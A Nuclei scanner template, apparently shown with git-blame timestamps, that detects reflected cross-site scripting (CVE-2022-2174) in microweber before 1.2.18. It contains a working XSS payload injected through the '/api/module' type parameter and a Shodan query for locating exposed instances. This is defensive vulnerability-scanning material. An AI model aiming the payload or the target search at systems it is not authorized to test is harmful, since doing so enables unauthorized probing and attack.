2023-10-17 07:20:28 +00:00
|
|
|
id: CVE-2022-2174
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: microweber 1.2.18 - Cross-site Scripting
|
|
|
|
author: r3Y3r53
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.18.
|
|
|
|
reference:
|
|
|
|
- https://huntr.dev/bounties/ac68e3fc-8cf1-4a62-90ee-95c4b2bad607/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-2174
|
|
|
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-2174
|
|
|
|
- https://www.tenable.com/cve/CVE-2022-2174
|
2023-10-17 17:52:26 +00:00
|
|
|
- https://github.com/microweber/microweber/commit/c51285f791e48e536111cd57a9544ccbf7f33961
|
2023-10-17 07:20:28 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2022-2174
|
2023-10-17 17:52:26 +00:00
|
|
|
cwe-id: CWE-79
|
2023-10-18 16:26:30 +00:00
|
|
|
epss-score: 0.00112
|
2023-10-23 12:22:20 +00:00
|
|
|
epss-percentile: 0.44371
|
2023-10-17 07:20:28 +00:00
|
|
|
cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:*
|
|
|
|
metadata:
|
|
|
|
verified: true
|
|
|
|
max-request: 1
|
2023-10-17 17:52:26 +00:00
|
|
|
vendor: microweber
|
|
|
|
product: microweber
|
2023-10-17 17:21:59 +00:00
|
|
|
shodan-query: http.favicon.hash:780351152
|
2023-10-17 17:52:26 +00:00
|
|
|
tags: huntr,cve,cve2023,microweber,xss,unauth
|
2023-10-17 07:20:28 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test"
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- 'status_code == 500'
|
|
|
|
- 'contains(body, "<script>alert(document.domain)</script>") && contains(body, "microweber")'
|
|
|
|
- 'contains(content_type, "text/html")'
|
|
|
|
condition: and
|
2023-10-23 12:51:13 +00:00
|
|
|
|
|
|
|
# digest: 4a0a00473045022047eafa3e081fcd82edc00c966b187c2ae95b990b7e69e7909743ff1cb46f02c9022100d99d9e829cbe0906f29dc65833a5534393e13e32cffac2b5b88bedfe14465652:922c64590222798bb761d5b6d8e72950
|